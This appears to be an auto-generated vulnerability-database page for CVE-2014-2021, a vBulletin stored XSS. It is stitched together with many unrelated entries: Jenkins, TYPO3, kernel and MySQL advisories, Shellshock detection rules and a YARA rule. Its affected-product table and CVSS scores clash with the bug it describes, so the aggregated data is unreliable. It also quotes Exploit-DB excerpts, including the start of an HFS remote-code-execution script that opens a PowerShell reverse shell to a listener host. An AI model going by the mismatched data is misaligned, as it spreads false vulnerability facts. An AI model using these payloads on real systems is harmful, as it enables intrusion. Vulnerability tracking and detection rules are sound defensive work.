CVE-2014-2021
Published: 2014-10-25
Priority: P4 · Severity: low · CVSS 2.0 base score: 3.5 (AV:N/AC:M/Au:S/C:N/I:P/A:N)
Exploit: available
EPSS: 3.39% (87.3rd percentile)
Cross-site scripting (XSS) vulnerability in admincp/apilog.php in vBulletin 4.2.2 and earlier, and 5.0.x through 5.0.5 allows remote authenticated users to inject arbitrary web script or HTML via a crafted XMLRPC API request, as demonstrated using the client name.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jenkins | git_plugin | — | — |
| jenkins | jenkins_core | — | — |
| jenkins | jenkins_lts | — | — |
| jenkins | jenkins_weekly | — | — |
| typo3 | cms | >= 11.0.0 < 11.5.0 | 11.5.0 |
| typo3 | cms-core | >= 11.0.0 < 11.5.0 | 11.5.0 |
| vbulletin | vbulletin | <= 4.2.2 | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 3.5 | LOW | AV:N/AC:M/Au:S/C:N/I:P/A:N |
| ghsa | — | 9.8 | CRITICAL | — |
| osv | — | 6.5 | MEDIUM | — |
| vendor_redhat | — | 7.8 | HIGH | — |
| vendor_oracle | — | 4.9 | MEDIUM | — |
OSV: php-dompdf vulnerabilities
osv · 2023-08-08 · CVSS 6.5 · CVE-2014-5011
It was discovered that Dompdf was not properly validating untrusted input when
processing HTML content under certain circumstances. An attacker could
possibly use this issue to expose sensitive information or execute arbitrary
code. This issue only affected Ubuntu 16.04 LTS.
(CVE-2014-5011, CVE-2014-5012, CVE-2014-5013)
It was discovered that Dompdf was not properly validating processed HTML
content that referenced PHAR files, which could result in the deserialization
of untrusted data. An attacker could possibly use this issue to execute
arbitrary code. (CVE-2021-3838)
It was discovered that Dompdf was not properly validating processed HTML
content that referenced both a remote base and a local file, which could
result in the bypass of a chroot check. An atta
GHSA: Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa · 2022-05-24 · CVSS 9.1 · CVE-2021-21685 [CRITICAL] · CWE-862
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2427 / CVE-2021-21685: `FilePath#mkdirs` does not check permission to create parent directories.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](https://www.jenkins.io/security/advisory/201
GHSA: Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa · 2022-05-24 · CVSS 9.1 · CVE-2021-21689 [CRITICAL] · CWE-862
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2485 / CVE-2021-21689: `FilePath#unzip` and `FilePath#untar` were not subject to any access control.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](https://www.jenkins.io/security/advisory
GHSA: Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa · 2022-05-24 · CVSS 9.8 · CVE-2021-21693 [CRITICAL] · CWE-285
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2539 / CVE-2021-21693: When creating temporary files, permission to create files is only checked after they’ve been created.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](https://www.jenk
GHSA: Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa · 2022-05-24 · CVSS 9.1 · CVE-2021-21687 [CRITICAL] · CWE-862
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2446 / CVE-2021-21687: `FilePath#untar` does not check permission to create symbolic links when unarchiving a symbolic link.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](https://www.jenk
GHSA: Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa · 2022-05-24 · CVSS 9.8 · CVE-2021-21692 [CRITICAL] · CWE-22
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2538 / CVE-2021-21692: The operations `FilePath#renameTo` and `FilePath#moveAllChildrenTo` only check read permission on the source path.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](htt
GHSA: Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa · 2022-05-24 · CVSS 9.8 · CVE-2021-21690 [CRITICAL] · CWE-22
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2486 / CVE-2021-21690: Agent processes are able to completely bypass file path filtering by wrapping the file operation in an agent file path.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory
GHSA: GHSA-6qpm-jgqq-hh7p: Cross-site scripting (XSS) vulnerability in admincp/apilog
ghsa_unreviewed · 2022-05-17 · CVE-2014-2021 [LOW] · CWE-79
Cross-site scripting (XSS) vulnerability in admincp/apilog.php in vBulletin 4.2.2 and earlier, and 5.0.x through 5.0.5 allows remote authenticated users to inject arbitrary web script or HTML via a crafted XMLRPC API request, as demonstrated using the client name.
GHSA: HTTP Host Header Injection
ghsa · 2021-10-05 · CVSS 5.0 · CVE-2021-41114 [MEDIUM] · CWE-20
### Meta
* CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:F/RL:O/RC:C` (3.5)
### Problem
It has been discovered that TYPO3 CMS is susceptible to host spoofing due to improper validation of the HTTP _Host_ header. TYPO3 uses the HTTP _Host_ header, for example, to generate absolute URLs during the frontend rendering process. Since the host header itself is provided by the client, it can be forged to any value, even in a name-based virtual hosts environment.
This vulnerability is the same as described in [TYPO3-CORE-SA-2014-001 (CVE-2014-3941)](https://typo3.org/security/advisory/typo3-core-sa-2014-001/). A regression, introduced during TYPO3 v11 development, led to this situation. The already existing setting _$GLOBALS['TYPO3_CONF_VARS']['SYS']['trustedH
Red Hat: kernel: nfc: fix segfault in nfc_genl_dump_devices_done
vendor_redhat · 2024-06-19 · CVSS 5.5 · CVE-2021-47612 [MEDIUM] · CWE-476
In the Linux kernel, the following vulnerability has been resolved:
nfc: fix segfault in nfc_genl_dump_devices_done
When kmalloc in nfc_genl_dump_devices() fails then
nfc_genl_dump_devices_done() segfaults as below
KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
CPU: 0 PID: 25 Comm: kworker/0:1 Not tainted 5.16.0-rc4-01180-g2a987e65025e-dirty #5
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-6.fc35 04/01/2014
Workqueue: events netlink_sock_destruct_work
RIP: 0010:klist_iter_exit+0x26/0x80
Call Trace:
class_dev_iter_exit+0x15/0x20
nfc_genl_dump_devices_done+0x3b/0x50
genl_lock_done+0x84/0xd0
netlink_sock_destruct+0x8f/0x270
__sk_destruct+0x64/0x3b0
sk_destruct+0xa8/0xd0
__sk_free+0x2e8/0x3d0
Red Hat: kernel: can: isotp: isotp_sendmsg(): add result check for wait_event_interruptible()
vendor_redhat · 2024-05-22 · CVSS 5.5 · CVE-2021-47457 [MEDIUM] · CWE-99
In the Linux kernel, the following vulnerability has been resolved:
can: isotp: isotp_sendmsg(): add result check for wait_event_interruptible()
Using wait_event_interruptible() to wait for complete transmission,
but not checking the result of wait_event_interruptible(), which can be
interrupted, will result in the TX buffer having multiple accessors and
the later process interfering with the previous process.
Following is one of the problems reported by syzbot.
WARNING: CPU: 0 PID: 0 at net/can/isotp.c:840 isotp_tx_timer_handler+0x2e0/0x4c0
CPU: 0 PID: 0 Comm: swapper/0 Not tainted 5.13.0-rc7+ #68
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1 04/01/2014
RIP: 0010:isotp_tx_timer_ha
Red Hat: kernel: btrfs: do not BUG_ON in link_to_fixup_dir
vendor_redhat · 2024-03-25 · CVSS 5.5 · CVE-2021-47145 [MEDIUM] · CWE-460
In the Linux kernel, the following vulnerability has been resolved:
btrfs: do not BUG_ON in link_to_fixup_dir
While doing error injection testing I got the following panic
kernel BUG at fs/btrfs/tree-log.c:1862!
invalid opcode: 0000 [#1] SMP NOPTI
CPU: 1 PID: 7836 Comm: mount Not tainted 5.13.0-rc1+ #305
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:link_to_fixup_dir+0xd5/0xe0
RSP: 0018:ffffb5800180fa30 EFLAGS: 00010216
RAX: fffffffffffffffb RBX: 00000000fffffffb RCX: ffff8f595287faf0
RDX: ffffb5800180fa37 RSI: ffff8f5954978800 RDI: 0000000000000000
RBP: ffff8f5953af9450 R08: 0000000000000019 R09: 0000000000000001
R10: 000151f408682970 R11: 0000000120021001 R12: ffff8f5954978800
R13: ffff8f5952
Red Hat: kernel: mm/hwpoison: clear MF_COUNT_INCREASED before retrying get_any_page()
vendor_redhat · 2024-03-04 · CVSS 5.5 · CVE-2021-47090 [MEDIUM] · CWE-20
In the Linux kernel, the following vulnerability has been resolved:
mm/hwpoison: clear MF_COUNT_INCREASED before retrying get_any_page()
Hulk Robot reported a panic in put_page_testzero() when testing
madvise() with MADV_SOFT_OFFLINE. The BUG() is triggered when retrying
get_any_page(). This is because we keep MF_COUNT_INCREASED flag in
second try but the refcnt is not increased.
page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0)
------------[ cut here ]------------
kernel BUG at include/linux/mm.h:737!
invalid opcode: 0000 [#1] PREEMPT SMP
CPU: 5 PID: 2135 Comm: sshd Tainted: G B 5.16.0-rc6-dirty #373
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
RIP: releas
Red Hat: kernel: rtw88: Fix array overrun in rtw_get_tx_power_params()
vendor_redhat · 2024-02-29 · CVSS 7.8 · CVE-2021-47065 [HIGH] · CWE-121
In the Linux kernel, the following vulnerability has been resolved:
rtw88: Fix array overrun in rtw_get_tx_power_params()
Using a kernel with the Undefined Behaviour Sanity Checker (UBSAN) enabled, the
following array overrun is logged:
UBSAN: array-index-out-of-bounds in /home/finger/wireless-drivers-next/drivers/net/wireless/realtek/rtw88/phy.c:1789:34
index 5 is out of range for type 'u8 [5]'
CPU: 2 PID: 84 Comm: kworker/u16:3 Tainted: G O 5.12.0-rc5-00086-gd88bba47038e-dirty #651
Hardware name: TOSHIBA TECRA A50-A/TECRA A50-A, BIOS Version 4.50 09/29/2014
Workqueue: phy0 ieee80211_scan_work [mac80211]
Call Trace:
dump_stack+0x64/0x7c
ubsan_epilogue+0x5/0x40
__ubsan_handle_out_of_bounds.cold+0x43/0x48
rtw_get_tx_power_params
Red Hat: kernel: f2fs: compress: fix race condition of overwrite vs truncate
vendor_redhat · 2024-02-28 · CVSS 4.7 · CVE-2021-46982 [MEDIUM] · CWE-362
In the Linux kernel, the following vulnerability has been resolved:
f2fs: compress: fix race condition of overwrite vs truncate
pos_fsstress testcase complains a panic as below:
------------[ cut here ]------------
kernel BUG at fs/f2fs/compress.c:1082!
invalid opcode: 0000 [#1] SMP PTI
CPU: 4 PID: 2753477 Comm: kworker/u16:2 Tainted: G OE 5.12.0-rc1-custom #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
Workqueue: writeback wb_workfn (flush-252:16)
RIP: 0010:prepare_compress_overwrite+0x4c0/0x760 [f2fs]
Call Trace:
f2fs_prepare_compress_overwrite+0x5f/0x80 [f2fs]
f2fs_write_cache_pages+0x468/0x8a0 [f2fs]
f2fs_write_data_pages+0x2a4/0x2f0 [f2fs]
do_writepages+0x38/0xc0
__writeback_single
Red Hat: kernel: net/sched: sch_frag: fix stack OOB read while fragmenting IPv4 packets
vendor_redhat · 2024-02-27 · CVSS 7.1 · CVE-2021-46954 [HIGH] · CWE-125
In the Linux kernel, the following vulnerability has been resolved:
net/sched: sch_frag: fix stack OOB read while fragmenting IPv4 packets
when 'act_mirred' tries to fragment IPv4 packets that had been previously
re-assembled using 'act_ct', splats like the following can be observed on
kernels built with KASAN:
BUG: KASAN: stack-out-of-bounds in ip_do_fragment+0x1b03/0x1f60
Read of size 1 at addr ffff888147009574 by task ping/947
CPU: 0 PID: 947 Comm: ping Not tainted 5.12.0-rc6+ #418
Hardware name: Red Hat KVM, BIOS 1.11.1-4.module+el8.1.0+4066+0f1aadab 04/01/2014
Call Trace:
dump_stack+0x92/0xc1
print_address_description.constprop.7+0x1a/0x150
kasan_report.cold.13+0x7f/0x111
ip_do_fragment+0x1b03/0x1f60
sch_
Red Hat: mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Jan 2021)
vendor_redhat · 2021-01-19 · CVSS 4.9 · CVE-2021-2014 [MEDIUM]
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PAM Auth Plugin). Supported versions that are affected are 5.7.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
Package: mysql (Red Hat Enterprise Linux 6) - Not affected
Package: mariadb (Red Hat Enterprise Linux 7) - Not affected
Package: mariadb:10.3/mariadb (Red Hat Enterprise
Oracle: Oracle MySQL Risk Matrix: Server: PAM Auth Plugin vulnerability
vendor_oracle · 2021-01-15 · CVSS 4.9 · CVE-2021-2014 [MEDIUM]
CVE: CVE-2021-2014
CVSS: 4.9
Protocol: MySQL Protocol
Remote exploit: No
Affected versions: Network
Advisory: cpujan2021 (JAN 2021)
Suricata: ET EXPLOIT VisualDoor Sonicwall SSL VPN Exploit Attempt
suricata · 2021-01-25 · CVE-2014-6271
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT VisualDoor Sonicwall SSL VPN Exploit Attempt"; flow:established,to_server; http.uri; content:"/cgi-bin/jarrewrite.sh"; endswith; fast_pattern; http.user_agent; content:"|28 29 20 7b|"; reference:url,darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/; reference:cve,2014-6271; classtype:attempted-admin; sid:2031543; rev:2; metadata:attack_target Client_Endpoint, created_at 2021_01_25, cve CVE_2014_6271, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_01_25;)
Suricata: ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers
suricata · 2014-09-25 · CVSS 9.8 · CVE-2014-6271 [CRITICAL]
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers"; flow:established,to_server; http.header; content:"|28 29 20 7b|"; fast_pattern; content:"bash|20 2d|c"; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2019232; rev:7; metadata:created_at 2014_09_25, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_11_03, reviewed_at 2024_03_06;)
YARA: Linux_Exploit_CVE_2014_3153_1c1e02ad
yara · CVSS 7.8 · CVE-2014-3153 [HIGH]
rule Linux_Exploit_CVE_2014_3153_1c1e02ad {
    meta:
        author = "Elastic Security"
        id = "1c1e02ad-eb06-4eb6-a424-0f1dd6eebb2a"
        fingerprint = "a0a82cd15713be3f262021d6ed6572a0d4763ccfd0499e6b9374764c89705c2a"
        creation_date = "2021-01-12"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2014-3153"
        reference_sample = "64b8c61b73f0c0c0bd44ea5c2bcfb7b665fcca219dbe074a4a16ae20cd565812"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { 55 48 89 E5 48 83 EC 40 48 89 7D C8 48 8D 4D D0 48 8B 45 C8 BA 24 00 }
    condition:
        all of them
}
Exploit-DB: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
exploitdb · 2021-10-18 · CVSS 7.5 · CVE-2018-16060 [HIGH]
---
# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
# Date: 2021-17-10
# Exploit Author: Hamit CİBO
# Vendor Homepage: https://www.inea.si
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
# Version: ME RTU
# Tested on: Windows
# CVE : CVE-2018-16060
# PoC
# Request
GET /web HTTP/1.1
Host: **.**.**.***
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
# Response
HTTP/1.1 200 OK
Date: Wed, 08 Aug 2018 08:09:53 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Location: web.tar
Vary: negotiate
TCN: choice
Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT
ETag: "93800-50
Exploit-DB: GetSimple CMS 3.3.4 - Information Disclosure
exploitdb · 2021-06-02 · CVSS 7.5 · CVE-2014-8722 [HIGH]
---
# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
# Date 01.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: http://get-simple.info/
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
# Version: 3.3.4
# CVE: CVE-2014-8722
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit
'''
Description:
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
(1) data/users/.xml,
(2) backups/users/.xml.bak,
(3) data/other/authorization.xml, or
(4) data/other/appid.xml.
'''
'''
Import required modules:
'''
import sys
import requests
'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
cmspath
Exploit-DB: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
exploitdb · 2021-02-23 · CVSS 9.8 · CVE-2014-6287 [CRITICAL]
---
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $clien
Exploit-DB: vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API (Authenticated) Persistent Cross-Site Scripting
exploitdb · 2014-10-12 · CVSS 3.5 · CVE-2014-2021 [LOW]
---
CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth)
Overview
date : 10/12/2014
cvss : 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base
cwe : 79
vendor : vBulletin Solutions
product : vBulletin 4
versions affected : latest 4.x and 5.x (to date); verified "API-Key" and enable the API interface, generate key
goto "vBulletin API"->"API-Log" and enable all API logging
2) run PoC
edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
run PoC, wait for SUCCESS! message
3) trigger exploit
logon to AdminCP
goto "vBulletin API"->"API-Log" and hit "view"
in search results click on "client name"
the injected msgbox pops up
Timeline
2014-01-14: initial
No writeups or analysis indexed.
References:
* http://packetstormsecurity.com/files/128691/vBulletin-5.x-4.x-Persistent-Cross-Site-Scripting.html
* http://seclists.org/fulldisclosure/2014/Oct/55
* http://seclists.org/fulldisclosure/2014/Oct/63
* http://www.securityfocus.com/bid/70577
* http://www.securitytracker.com/id/1031000
* https://exchange.xforce.ibmcloud.com/vulnerabilities/97026
* https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021
Timeline: 2014-10-25 · Published